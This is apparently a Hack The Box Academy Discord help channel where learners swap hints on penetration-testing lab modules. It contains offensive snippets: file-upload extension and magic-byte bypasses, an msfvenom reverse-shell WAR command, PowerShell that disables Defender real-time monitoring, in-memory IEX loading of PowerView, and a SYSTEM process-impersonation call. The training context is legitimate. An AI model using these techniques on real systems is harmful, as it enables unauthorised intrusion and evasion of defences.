#modules

thank you payloadbunny

Run a UDP scan in NMAP and review the SNMP section of the module

And the engagement briefing gives you a reason to look there

Hi guys, has anyone done Zephyr pro lab ?

There's a #prolabs-zephyr channel read #welcome on instructions on how to gain access to more of the server

Thanks

server is expecting a .gif but the data inside of the file is not a gif

maybe try swapping the extensions

looking for help on Attacking Common Applications - Attacking Tomcat the Login Brute Force part. I tried with python and metasploit as showed in the module but am not able to get working credentials. What am I missing here?

you did not try what i said 🤷

File.png.phtml

Instead of file.phtml.png

ohh thanks u guys, it worked, idk i tried this on other sections and it worked, so i was stuck there, thanks sir

any time

That was a BRUTAL skill assessment but great

Does anyone have a second for DNS enumeration help

If you just ask your question, plus say the module and what youve done youll get a quicker response

ok gotcha, I haven't used this before sorry

Need help enumerating FQDN of IP x.x.x.203

used dig axfr internal.inalenfreight.htb @10.129.136.250 to get SOA's

subsubdomains exist

also you gonna need bruteforce for that one

@grizzled schooner you mean this question: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

no, one second, and is there a reason that the syntax I just posted got erased?

only returned 1 answer which was a 127.0.0.1

Subdomain of a Subdomain

Hey. someone had finish the module malware analysis and can help me with the skill part ? 😅

Well I'd tell you to git gud but your pfp beat me to it

Marcie, could you give me another nudge? I feel like I've tried everything and I am honestly just lost

Then you haven't tried everything

You're meant to use the bruteforce tool

dnsenum right?

Yes

trust me git gud is my wallpaper. i complete all the module i am just stuck on one question. i dont want answer just a tips for the good road

I've tried posting the syntax, but it just gets removed so it isn't much help lol

Probably bc spoiler

||can I use this to post the syntax then||

try ¯_(ツ)_/¯

I've tried using ||dnsenum --dnsserver 10.129.136.250 --enum -p 0 -s 5 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --threads 90 inlanefreight.htb and have subbed the wordlists as well||

Yeah but you're not looking at subdomains of subdomains

You're just looking at the main domain

The f* wordlist is the correct wordlist

i can find the domain in the apple.txt i tried static analysis and dynamic but i cant find anything. i foud all the rest

i cant find the domain *

Sirg I haven't done this module I was just poking fun

I have put for example ||ns.inlanefreight.htb root.inlanefreight.htb|| and none of them give me a response

There's more than those 2 on the main domain

don't they have to be SOA though?

No

🤣

oh okay, I thought they did, I will keep trying then, thanks

soa is just a record

The A record points to other subdomains

Module:FIle Upload Attacks
Section:Skills Assessment
Have bypassed everything and found a directory, but cannon find a magic byte, tried everything but cannot get last thing
do anyone have a nudge?

SOA is just info on that domain zone

have ran that ||dnsenum|| syntax and substituted ||x.inlinefreight.htb|| with all of the options that I was given, and nothing was returned due to ||NS record query failed||

Just wait, ns query will more often than not fail

Literally just be patient

Also inlanefreight, not inlinefreight

yeah sorry typed that out wrong, but it just returns me to run new syntax, it doesn't keep running

You shouldn't need to do anything with threads

I did change that and took that out when I ran the list of subdomains that I got, but I'm not getting anything

Your list of sudomains is probably wrong

I don't know how to upload a picture and add the spoiler, can I pm it to you

Do a manual zone transfer and see if the A records line up with your subdomains.txt more than likely you managed to omit the right one

Also for some reason you're doing -s 5?

I just checked @grizzled schooner the example they give you with the wordlist won't give you the full list of subdomains

I used this : ||ÿØÿî|| Also make sure you are uploading a real image and altering its data to reverse shell payload. I mean don't upload file that you renamed like this : ||mv shell.phar shell.phar.jpeg||

I mean ordering matters as well

.png.extension also bypasses as the server only sees the .png part and passes it

Yep

Good Afternoon im having an issue with windows Prive Escalation - Windows Privilage users , any assitance would be useful

Hy

Is someone can help me

Nevermind .... it requires port specification

Just ask your question

for anyone who use ligolo-ng for pivoting how do u guys change the port for the intial connectio 11601

Maybe this will help you
https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740

thank you payload

so helpfu;

Guys

give me some help here:

question: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

module: Nmap

So enumerate all the open ports and their services

I alredy did this

Tbh this one is a bit of a pain with your own vm, pwnbox gives the answer like 99% of the time

and nc all the open ports

Sometimes you need to reset the box a few times

and even use tcpdum

Did you do a full port scan?

tcpdump*

-p-

yes sir

I look at this with all my resources

and nothing happen

I found one port 31337

Sec

I look at and nothing too

Maybe try : ||-p31337 -A ||

How long did you wait?

I use the --packet-trace and look

and after use tcpdump too and look again

nothing too

You said you found 31337 right?

You need to wait around 10-20 seconds after using netcat

Also, if you're doing tcpdump are you specifying tun0 as the interface?

yup

But yeah just gotta wait

letme try this

Zzz

got it

Patience is a key virtue in this field

Thank you @fathom pendant I would kiss you but you are so far away

Don't

That's weird

on the face of course

Still don't

alright. I don't

That's double weird

lol why?

I'm kidding

in my country it is a sign of friendship

and love as well

Sorry, I didn't know that.

I understand that, I'm just not a fan of people being near my face

hey all need some help

i'm doing the intro to brute forcing

section login forms

but the page isn't loading

is the Target up and running?

^

Might need to reset target

yea it was a reset but i just started the dumb thing

So I'm doing the Windows File Transfer Module and I'm wondering something about this question:

"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer."

It seems to be asking that we upload the zip file to the target Windows machine before you RDP into the machine and if that's the case I'm a bit stuck. I easily got the question answered by RDP into the machine first then simply downloading the zip from my attack host, but now I'm wondering if I was supposed to somehow upload it to the target without being in control of the Windows machine. If that's what I was supposed to do, any tips on how to upload the file to the Windows target without first RDP into it?

I need help with question at the last of this section from the module "intro to bash scripting"

https://academy.hackthebox.com/module/21/section/128

error reading input file

i get this error every time

are u try .phar in last extension ?

shell.phar%20.jpg

it uploads but doesnt execute

it double ext right ?

yes

do you try to swap ext ?

i didnt

should i?

.phar.png should work for that one

I tried and it didnt

Tried swapping too

works for me

Hmm

after resetting 5 times it worked lol

sure !

Greetings everyone. I'm current working on 'Intro to Assembly' assessment task 1. After decoding the shellcode on stack, I found it contains many memory related operations where registers get dereferenced with default value 0, which leads to memory accesses to address closed to 0 and therefore result in segfault. I don't think manually mmap a memory page at the lower addresses are possible solutions as mmap syscall will randomly allocated a memory trunk at higher address if the provided address is 0. So, there might be a context or a special environment where the shellcode should execute. Any hints on this?

Did anyone went through "Introduction to Digital Forensics" and completed Skills Assessments?
Did you had to download additional tools beside the ones that come with the machine???

What ? Dude once decode the Shellcode you just have to run it with the python loader and get the flag , if You are having segmentation issues maybe your decoding is not right.

Thanks for the reply. My current solution xors the 14 qwords one by one with the original key from rbx(like ECB), which yields the current shellcode. However, I also tried updating the key with the last decoded qword(like OFB), which yields to a trunk of bad instructions. Probably I should try updating the key with the previous encoded qword(like CFB)🤔

i'm stuck on value fuzzing. i can get the right ID# but my curl command only outputs i don't have access to that flag.

can anyone help me with that one?

Hey Goodnight Im having an issues with windows priv SeDebugPrivelege can someone assist me

Currently doing shells and payloads module > bind shell, trying to bind a bash shell in the server so i can connect from client, but im not able to use commands, all i can do is send messages. what am i doing wrong?

Often when I rdp to Windows hosts , I end up with this:
any neat trick to avoid this?

have tried different resolutions

It's just a screensaver, press enter

lol

thanks

Your command isn't quite the same as shown in the "SeDebugPrivilege" section

Unfortunately, none of the above mentioned attemps work. I've replied to a forum post with details of my approach. I hope it would provide more information on why I got stuck ¯_(ツ)_/¯

ON module AD / ACl Abuse tactics - I've been able to obtain the hash for said user. however when I try to crack it offline with hashcat I get ' no hash loaded'. Am I formatting the Hash file wrong?

nvm stupid question, seems like there was some line breaks added

Hello there ! I've been struggling on the machine that I have to hack in the Getting Started module, where you have to use metasploit and exploitdb to find a way to break through a sample WordPress website. I did find the WordPress version, but I have no clue on how to find the specific plugins used on the site in order to find a fitting exploit. Furthermore, while searching on exploitdb using searchsploit, I only found a few exploits associated with this version of WordPress, which were correlated with plugins which don't seem to be on this particular site. I also tried doing some page / directory enumeration using gobuster without much success... Can someone give me a tip on how I'm supposed to find the plugin that I will use to break through ? Thanks in advance for your help 🙂

https://academy.hackthebox.com/module/144/section/1256
Managed to get question 1 and 2
But now the target is bugged even after I reset
I can't do 3

┌─[eu-academy-1]─[10.10.15.11]─[htb-ac-1018999@htb-ybrut9267e]─[~]
└──╼ [★]$ dig ns inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> ns inlanefreight.htb @10.129.42.195
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5763
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ef5f3e49c6957c4201000000653b70557fbd4ce90b9be825 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN NS

;; ANSWER SECTION:
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.

;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1

;; Query time: 6 msec
;; SERVER: 10.129.42.195#53(10.129.42.195) (UDP)
;; WHEN: Fri Oct 27 09:09:56 BST 2023
;; MSG SIZE rcvd: 107

┌─[eu-academy-1]─[10.10.15.11]─[htb-ac-1018999@htb-ybrut9267e]─[~]
└──╼ [★]$ dig axfr ns.inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr ns.inlanefreight.htb @10.129.42.195
;; global options: +cmd
; Transfer failed.

Your query is wrong
dig example.com @rustic sage-ip

You cannot have space between ns and inlanefreight.htb

anyone able to remind me of IMAPS syntax?

|| im doing footprinting hard and ive found the credentials for tom and im logged in the IMAPS service and can see the mailboxes and i wanna list all emails under important but i cannot do it ||

for 1 FETCH <ID> is the ID just the mailbox name?

#modules message

dayum that was first

thanks payloadbunny 🙂

woooo!

that was a fun module

up

This Question?
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

If so, take a look at the source code of the website. Then you will surely find a plugin which you can attack. Maybe use ||wpscan||

yes that's this question

i'll try again, thanks for the help

Why could all all be marked as error? It is the Burp Intruder chapter.

In the WINDOWS PRIVILEGE ESCALATION - Pillaging part, the exercises goes through a cookie editing part at slack.com. There's no internet access however, is this on purpose? It's specified to access slack through the spawned windows instance.

after using the tool you suggested, I found no plugin whatsoever, which leaves me on a dead end :/ I tried exploiting it via XML-RPC by trying the only exploit I could find on metasploit related to it, but it did not lead to anywhere... I really feel like I'm missing something obvious there, given that it's supposed to be one of the very first modules to do as a beginner. Any clue ? Thanks for your help btw

Think about how the site makes a backup

Don't get discouraged. You can do it 💪

Can someone who has finished the shell and payload module help?

I've spent hours trying to hack host1, but I can't find it.

For future questions about the topic, slack.com is not the target, rather slacktestapp.com. It differs from the walkthrough.

so it was indeed obvious ahahah, right under my nose ! I found the exploit we're supposed to use on this machine and ended up with a big list of file adresses, but I don't get how I'm supposed to use this information since no matter how I write the url, it doesn't load anything. Am I supposed to connect to the site using ssh or with some GET http request ?

(exemples of such file/directory adresses)

With the right exploit in Metasploit, you can download a file (flag.txt)

Would I might have to use another password cracking method to find wills password or did I probably enter wrong information?

https://academy.hackthebox.com/module/147/section/1319

Which section are you on?

Section 1319

The name is more helpful

Passwd, Shadow & Opasswd

You did the credential hunting in linux section yes?

on the AD module / ACL . We go through both how to take over accounts and updating there password as well as utilizing DCSync to dump hashes and tickets.
In a real life scenario would the ladder to be preferred?

Yes. So they ant me to use credentials from the last sectio

Latter* btw

*they want

Yes

This section has you reuse credentials you find

It's best to save them in a file

ok, reason why I ask I in the section after 'privilged access' you are asked to reset the password

Hey everyone, I'm stuck on the Live Engagement of the Shells and Payloads module. I've RDP'ed into the jump box and managed to complete the first few questions. The problem I have run into is the only browser I seem to have available is Links2. Links doesn't seem to be rendering most of the blog page, I can see a form in the html that isn't being rendered. Am I off in left field? Am I supposed to fix Links or did I miss a browser, or is there another path I'm not thinking of entirely?

which section is it?

the live engagement

type "firefox" in terminal

... well don't I feel dumb

?

oh, it worked. I can't believe I didn't try that

it's just that i had same issue when was doing that section

xd

well, thank you! I won't forget to try that again in the future, thats for sure lol

Module: RDP and SOCKS Tunneling with SocksOverRDP
Link: https://academy.hackthebox.com/module/158/section/1439

Problem:
Im following the steps in the module per usual, however no matter which version of SocksOverRDPx64.zip I download, once I extract the files, the windows vm that I am RDP'd into as htb-student, automatically deteles the .dll file needed.

I already checked the Windows Security settings and it is showing as disabled. Am I suppose to figure out how to bypass windows security without even doing a module related to that yet? Or is this an error.

Get-MpComputerStatus and check if the antivirus is enabled and running, if so you can stop it

Interesting it does show True. Is this normal?

why not?

go to security under settings and disable real-time protection

guess I didnt expect to have to do this early on in academy.

simple

windows security app shows its disabled, but Get-MpComputerStatus shows true

its not the same !

real-time protection is the actual AV

ohhhh

weird name, but Microsoft is built different

I see, thanks!

any time

Set-MpPreference -DisableRealtimeMonitoring $true if you want do it from PS

thanks

more hacky

haha

Hi everyone, im just doing Active Directory Enumeration and Attack module, there is Powershell Module PowerView.ps1 but every time i am downloading it my bitdefender is detecting it and then deleting, so what is the purpose of this powershell module if any AntiViruse can detect and prevent it? how it can be used during Penetration Testing process?

disable the AV

haha 😄

i mean, you have command execution you can disable it

but also loading it in memory should work

with IEX

instead of downloading on drive

but what about permissions? in most cases compromised account dont have that permission

can you link any good tutorial? or detailed post about this?

in most cases you obfuscate tools like powerview or mimikatz, etc

it was mentioned in "File transfers" module

but here's the example

HTB academy explains it

if you're doing the path in order you should've learned this

and it's highly recommended to do it in order

probably lacking notes :S

(

probably

is it mentioned in AD enum & attack module?

before

order

are you doing the pen testing / CPTS path?

if so, you already learned this.

no im just doing this module "Active Directory Enumeration & Attacks"

right

but are you just doing that module randomly? or are you doing it because you're on the pentesting job role path?

may I dm you?

yes

i just wanted to learn Active Directory and have better understanding

the problem is that the module expects a good understanding of a lot of things before you do it, file transfers, pivoting, enumeration, common services, etc.

someone gave you the answer above. if you truly want to learn, i'd recommending doing the File Transfers and Pivoting modules first

also it is stated in the module description

totally possible to have learned those things elsewhere of course

look into running script in memory, adding exclusion folders and disabling AV

thank you guys for answering

it's just a few commands in powershell, but they're important

I can't look at the /etc/shadow because will doesn't have the permissions to look at the contents of that directory. I switched to kiras user and tried looking at the contents of the /etc/shadow directory and also was unable to. I tried editing the /etc/passwd contents by removing 'x' (since the module stated that if I removed 'x' , I could go to 'root's directory without being prompted for a password and I also had issues editnig the content of that /etc/passwd directory.

https://academy.hackthebox.com/module/147/section/1319

wrong approach

And why are there no boxes in "Status Code","Length" and "200 OK"?

wrong approach indeed, look very carefully what you have in will's home folder

enum is key as usual

Can someone who has finished the shell and payload module help?

ask your question

can't find a reverse shell suitable for hacking host01

msfvenom -> war

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat

lol, you already know which host that is

msfvenom I tried for 8 hours but no result.

big brain

what did you try?

I have tried almost all of apache tomcat and smb payloads, the result is that I cannot establish a connection

I need to add a reverse shell to the apache server with a java programming language, but after adding it, I listen to it and there is no result.

send your msfvenom command and what you're doing to catch the shell

is sharing notes normal thing here? im just new and i dont know sorry 🙂 if you can share notes i would be grateful but if not, sorry for asking

I can't take a photo because I'm on the bus.

you will be totally lost on my notes

xD

@rustic sage multi handler

people don't usually share their notes. everyone takes notes differently

did you trigger the shell? 🤔

@hallow kilnyes

i'm not going to help you if you can't read simple instructions...

send your msfvenom command and what you're doing to catch the shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war

you run this, you upload it, you visit it

there is a start stop button also clicked

I mean there's no rule against it, but notes are too individual to be useful to anyone else

its not there

I don't even remember that button

@sly domeI've used this one, but it didn't work.

it definitely works

here

actually im experienced in playing CTFs, i just dont know some of details

please can anyone help with file uploads module whitelist filters section?

also be careful with LHOST and LPORT values

Yes, I uploaded it there.

@sly dome LHOST 172.16.1.5 right ?

wrong

your tun0 ip

LHOST is your own IP

https://academy.hackthebox.com/module/136/section/1289

tun0 like Rafa said

what is your question?

I'll try again from the beginning. I'll be back.

ty <#

your error is just wrong IP

whitelist filtersfile uploads module

any time

i know, but be more specific

which step are you at?

@sly dome can i dm you?

I have ran intruder with some upload files names with payload content being a php script to print hello world but I keep getting File not found when I try to access one time I got Forbidden

yes

File not found = wrong path or didnt upload

Forbidden = you are trying to get into the wrong path

but in says it uploaded in burpsuite

probably wrong path

i sent freind request

check the page source and you will see the path

accepted

Am I heading in the right direction at least ?

the name of the file is just ".jpg" which is strange bcuz that's not what I uploaded also didn't print hello word but it's a blank page not throwing any errors

transfer those to your own machine

one way to do it is using base64, another is using simple HTTP server

yesterday I used 'scp' as a transfer method. Perhaps the 'scp' or the simple HTTP(with netcat?) will work

with wget in my opinion

nix01 has python3

from nix01: python3 -m http.server
from your host: wget <nix01's IP>:8000/passwd.bak

can also work

still stuck here

1st bypass blacklist, when you done with it -> bypass whitelist

can be done manually

I thought getting a succesful upload at all means both have been bypassed?

yes

it does

but it doesnt output anything

just blank white screen

which extension?

this is the view source file name is just ".jpg" or ".png" changes depending on wat I upload

.jpg or .png is not gonna get interpreted as php by the server

||shell.php/.png|| is what I uploaded

1st you need a php extension that doesnt get blacklisted

why the '/'

dont do it with intruder

thought we need character injection?

that does not work with modern php

1st try simple things

try upload .php -> you will get blacklist warning

try another php's extensions until you get the whitelist warning

from there try to bypass it

got the flag thanks so much man

any time bro

Hello,

just doing Login Form Attacks question "Using what you learned in this section, try attacking the '/login.php' page to identify the password for the 'admin' user. Once you login, you should find a flag. Submit the flag as the answer. ". I used Hydra and found .....Every time another password.
Any idea?

Best regards
Christian

I think your Hydra Command is wrong.
But without details it is difficult to judge

have you made sure everything is set correctly, proper username and pass parameters, and very important - the fail condition

will begin again with this question,, verify all again and come back later 🙂 Was just questioning why each time i run Hydra against the login.php page it gives me another password. Was thinking as if i have wrong command it will not find anything it ,

it behaves weirdly when the command is incorrect, it could output that every password is correct for example

But it found me only one password each time, and each time another but with the same format (very similar) at some character differences. Will check all again my command

double-check everything, reset the target just to be sure, if it doesn't work, post your command and we can see what's up, then you can just delete once it's solved so it's not sitting as a full spoiler

the mode is just incorrect

I wouldn't use chatgpt for this

https://hashcat.net/wiki/doku.php?id=example_hashes

Guess you aree right

there you go!

ha!

oh and another thing, use the mutated password list, I think I saw rockyou there

oh okay

Update: you were right there was a mistyping in my command. Worked good now

awesome!

hello!

i'm doing the Advanced SQL Injection Module. Task 1. I found the blind vulnerability in ||/api/v1/check-user|| endpoint. And im exploiting it. I can extract the email value like||admin@pass2.htb|| or usernames, but I cannot extract the password, because something blocking to extract from ||password|| column. other columns like email, username works properly. Maybe im missing something((

hello

Detecting Windows Attacks with Splunk - I just enrolled on this where I can access sa the splunk lab?

@hallow kiln hello again I did what you said, I uploaded my payload file (shell.war) tomcat in the same way but I can't get a back connection

I already found the lab.

all good

Found it . Now why doesn't rockyoulist work?

because the password's not in it

and you've set all the parameters in metasploit correctly?

@hallow kiln absurdly after 10 minutes the connection came up . lol

@hallow kilnThank you for your help. ❤️

glad it worked!

Hi All. Can someone help me with lateral movement in the "Attacking Enterprise Networks" module. I have followed the steps to escalate privileges to administrator. But I get the following error:C:\Windows\system32>þ
'þ' is not recognized as an internal or external command, operable program or batch file.

I have used the same command provided in the material of that section. Including the full path to net.exe produces the same error message. Trying to execute a command like "whoami" results in the same error message.

I need help understanding what is going on. Thanks.

Solved: Check the encoding of pwn.bat

In the module for Kerberos Attack - Kerberoasting from Linux (module/25/section/830) it asks to find Adam's password but when I use GetNPUsers.py I only get ||amber.smith jenna.smith carole.rose|| is there something wrong with the section?

GetNPUsers is AS-REP roasting, not Kerberoasting

yea but in the section it showed how to use GETNPUsers to list kerbaroastable accounts

but the list i got didnt have adam

which si what the question is looking for

oh damn it

i made a big booboo

what an idiot

GetUserSPNs?

Ok so after more digging the only exploit I found on metasploit related to ||simple-backup|| (which I presume is the plugin that we're supposed to breach through) is the following : ||wp_simple_backup_file_read.rb|| which only gives me a full list of directory and user adresses like the ones I posted before. I tried looking for other exploits in other DBs such as exploitDB which brought me the following link : ||https://www.exploit-db.com/exploits/39883||, but it seems that the exploit is not compatible for the version used on the box as none of its vulnerabilities worked, at least for me. In summary, I'm not gonna lie, I'm really getting frustrated about this one as I just cannot find a way to breach through it even though it's supposed to be introductory... Can someone pls confirm that I'm searching exploits on the right plugins and if so, what is the name of the exploit I'm supposed to use, because I can't find more than one exploit on metasploit about this plugin. Thanks in advance for your help !

Hello guys, I am doing skills assessment 1 for the Windows Priv Esc module. The current user has the impersonate priv and I want to use juicy potato or print spoofer to get a revshell as system. However, I get errors with both. I suspect with juicypotato the problem could be the CLSID and I have been trying different values but it still doesn't work. Some CLSIDs iniate teh connection but its not a real shell aka I cannot issue commands. Anyone know about this problem?

just to give back some context, it's about the machine from this section : https://academy.hackthebox.com/module/77/section/843

On AD Module I just completed the session for Bleeding Edge Vulnerabilities and Miscellaneous Misconfigurations a lot of usefull stuff in these. Except for the boxes recommended in the end of Module . Are there a way to look up boxes where you could practice these exploits?

(Or if anyone have any recommendations)

Can somebody give me a hunt at skills assessment - using web proxies i´m at Q3
i dont understand how i can fuzz and encode the the cookie in one step with burp

Ok i formatted exactly like explained this is the result

Hello Hello, Im kinda new to all this stuff.
ATM Im doing the footprinting module and I'm stuck at the MSSQL Server Login... with the user I already found to login via RDP, I Can't log into the MSSQL Server

section?

can I see the first lines of "Sedebug.ps1"?

ok, mmm... I have used the second command shown with Get-Process anyway I'm going to quickly spawn the lab and see what's going on

E * Can potentially gather username structure from OSINT.

ok Thanks good looking out

What you mean exactly? I'm at the end, there are 3 maschines easy,medium and hard im currently stucked a the Module Footprinting medium maschine

Look around at the accessible files, there's an important document

could you please provide the exact command which you're using?

what a pain is the "pwnbox", anyway this is it:

Yes that is the correct thing i have the same

Hello, can someone help me with Intro to Assembly Language Skills Assessment? I'm having troubles in the second question...

and isn't working? Just give me another sec

Yeah I found it and I'm already logged in as priv user...
But this MSSQL ist really shit ngl

Eh the GUI is all about clicking around and finding out

find a suspicious table

Yeah, but anyway thank you very much mister

right click and edit 200 entries

The footprinting section isn't really expecting you to know any sql commands

(Attacking common services later on goes over sql commands, for both mssql and mysql

hi Im doing ntlmrelay attacks section ntlm relay over SMB attacks and when i execute ntlmrelayx i receive the following error, does anyone know whats happening thanks in advance ```root@ubuntu:/home/htb-student/tools/impacketv11/impacket/examples# python3 ntlmrelayx.py
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[] Protocol Client SMTP loaded..
[] Protocol Client SMB loaded..
[] Protocol Client RPC loaded..
[] Protocol Client MSSQL loaded..
[] Protocol Client DCSYNC loaded..
[] Protocol Client IMAP loaded..
[] Protocol Client IMAPS loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client LDAPS loaded..
[] Running in reflection mode
Traceback (most recent call last):
File "ntlmrelayx.py", line 482, in <module>
c = start_servers(options, threads)
File "ntlmrelayx.py", line 189, in start_servers
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
TypeError: setLDAPOptions() takes 12 positional arguments but 13 were given

Yeah funny thing is, I think I would be more familiar with SQL in CLI than this GIU stuff

I mean, you can do command line stuff, or use the "create new query" button in the gui

Mysql and mssql though have different commands

But how can I look into the tables itself? Via GUI I mean

Ok solved directly using ntlmrelayx.py because loads impacket v11 instead of 10

Right click the table and view

There is a commint made two days ago, now to run it would be:

PS C:\users\jordan> .\psgetsys.ps1; ImpersonateFromParentPid -ppid 5748 -command "c:\windows\system32\cmd.exe"
[+] Got Handle for ppid: 5748
[+] Updated proc attribute list
[+] Starting c:\windows\system32\cmd.exe ...True - pid: 4832 - Last error: 122
PS C:\users\jordan>

Can I dm u?

Sure

Ohhh wow

thank you will check it out

Found it 😎 Thank you sir

Module:Password Attacks
Section:Password Reuse / Default Passwords
Tried every password for every use, also tried find a default creds for mysql but didnt find it in google, says that there is no default password and u need to set a password, could anyone help me pls?

There's a link given to you

github

It is in fact there I just checked

yeah i checked, u are right, sorry my bad

thanks guys

I also highly recommend saving any username:password combinations you get throughout this module

Module:Pivoting Section:SSH for Windows with plink.exe ---- has anyone tried this?

Yeah

@naive wadi did you get it working....

I figured it out

Because it's only expecting the ntlm part

Also remove the hash as it's still a spoiler

up

The file read is correct. Look at all the options again and think about what can be changed to give you the right answer

The file read exploit worked and gave you a specific file

But you can specify a different one

yeah, a txt file containing all those user~directory adresses that I don't quite understand yet

It's a specific linux file

thanks ALOT for the tip, I'll look for it tomorrow ^^

But that file isn't important AT all

If you keep trying to dig into it, you're just gonna hit a rabbit hole of nonsense

It's an intro module so it's gonna be simple

Module:Password Attacks
Section:Credential Hunting in Linux
Just have a question, do i need to bruteforce kira? bcs i have creds for sam user and im logged in...

Eventually

Actually no I think at this point you should already have her creds

Wait I'm dumb

Sorry it's been a minute

Sam doesn't have Will's creds :p

That's the point of this

And wills creds aren't in the password list AFAIK

oh ahaha, yeah i just checked everything and find nothing, thats bcs asked this

thanks for answer sir

There's a reason the hint tells you another user

do i need mutate "||LoveYou1",||(the hint) or just use mutated version of password.list?

That password is in the full list

but waiting a 30 minutes is too much... 🫤

It doesn't necessarily take that long if you brute force a service like ftp or any other service than ssh

Brother; this section will test your patience a lot

Also using an appropriate amount of threads like -t 48 will speed it up

haha yes I realized this recently. a bit boring module

understood, thank you sir

The skills assessments do test you on EVERYTHING :) and when you get to one of them use the discord search feature as there's been plenty of links on it

Eh the most boring is the pivoting module because it's not so much skill as it is just following step-by-step

ohh ahah sounds scary, thanks for nudge

Yeah,just follow the steps.

I'll be honest the pictures are confusing. I just made my own diagrams

I just didn’t know that I needed to complete %100 of the course to start the exam, so I madу about 50 boxes on the HTB, and then when I tried to go to the exam I found out about it and have been finishing it for a week now...(PAIN!)

Yeah it explicitly tells you, but also you should be doing the modules to completion anyway as there's techniques that would have shown up on the exam and you'd have spent longer to learn it and apply it than to just know it for the exam

👍

cat mutated | grep '^L'

grep -e

not needed

Sometimes grep doesn't play nice with regex

for start with or end with it works

I've had to add -e to a lot of my grep regex stuff with ^ or $

try it yourself 🤷

I have

me too

it works

I'd also prefer to just use -e as a habit

ofc

Hey I'm new to infosec type stuff here, the most I've done remotely relating to this is Android pentesting/rooting, web crawlers, and recently started helping with reversing iMessage (Pypush). Where do I start?

By reading #welcome because this chat is for module discussion not general questions

this is the channel most resembling a #general channel

also I did

No it isnt and no you didnt because your name is still white

You need to verify your account to access the rest of the server including #general

Well I don't have an account yet

Welp

sounds like a personal problem

Then make one on https://app.hackthebox.com and do the thing

It takes at most 5 minutes

Right well, thanks I guess

np will gladly answer the question in #general once you get access

Hi I am in the metasploit module meterpreter section I have done a scan and it reveals a smb, rdp and iis service I tried finding an exploit using the search option I tried using eternal blue and romance but they did not work the parameters I provided are in the snapshot. I would like to request some direction as I seem to be stuck.

any help please

It helps to show the error it gives you

Also running test helps

you mean the auxilaries right?

No I mean just running test or check

After setting options

Type check and hit enter

well I ran these

I will try the test option

Reset target

ok

its still the same

@sterile epoch - I dont think that is the right payload

I just ran it and worked first try

the other service I noticed was a httpd 10.0

did a search nothing popped

you don't need to port scan

ok thanks for the hint

Password Attacks:
hello again guys huh, is there maybe issues with machine? copied via scp a files, did ushadow passwd.bak shadow.bak, and tried with paswordlist, mutated passwordlist and it cannot find a password, tried with rockyou.txt but it holds too long and my pc will fking explode i think, checked also a search feature in discord and didnt find anything useful, did someone know where is my bad?

Well since you're only tasked with getting root, take that password only

Instead of doing the whole list

it is on mutated one

if you are using hashcat

you cant use the unshadow format

i suggest you to check hashcat modes

You can

It's just a pain

https://hashcat.net/wiki/doku.php?id=example_hashes

Hashcat would have thrown an error

you have to remove some stuff from here @tame ivy

You're kinda spoiling that hash my guy

You have a really bad habit of doing that when you're trying to help

well it cracked, result:exhausted was for other users, stupid thing, why it didnt print a cracked users, and just typed exhausted, i checked the output "-o cracked.hashes" and there was a password...

its not an skill assessment i dont care actually

It's still a spoiler lol

exhausted is not cracked

As part of the task is getting it in the first place

k i remove it

dont cry

Not crying lol, trying not to have you get thwacked by a mod

yeah i know, but in passwd and shadow thing was 4 users, i tried for 4 users instead for root only, and root was cracked, hashcat just didnt printed it

sure they care

They actually do care

:p

i've seen here A LOT of spoilers

not even removed or warned by a single mod

dont act plz

🙄

guys thanks for help, but please don't be angry at each other

we aren't

Seems like it's funny now

Spoilers are spoilers, if it's for a t0 module usually mods don't care as much as its fundamental

sorry can you please elaborate on the scan I tried
-sCV and U with Pn then -sn

You don't need to scan it is not the Nmap module

then how will I knw what exploit to use

Could you please provide the nmap scan you performed

sorry my machine timed out and I did not save the results in my local machine but its not different from any fast scan

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5000/tcp open  upnp

It's fine, okay, did you try the exploit with other payload?

I mean not the simple meterpreter, but with x64

ok so I need to use the encoding concept too

I will do so now

No, wait

windows/x64/meterpreter/reverse_tcp

Did you try with this payload? Because sometimes the default payload doesn't work

yes

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

What is the exact question you are stuck on?

I am still a little fuzzy with the payload encoding concept and I am stuck on both the questions in the meterpreter section

Also don't confuse people with strange advice like "don't use port scan"

Okay, could you please send the screenshot of options of your exploit?

here

What's the target there?

Also you're using there default payload "windows/meterpreter/reverse_tcp" not the "windows/x64/meterpreter/reverse_tcp"

automatic

Iirc there's x64 windows

this default one

In my case this one windows/x64/meterpreter/reverse_tcp worked completely fine

@supple patio

he is using it

Yeah, I see

i did not do that module i cant help xD

(totally avoiding it)

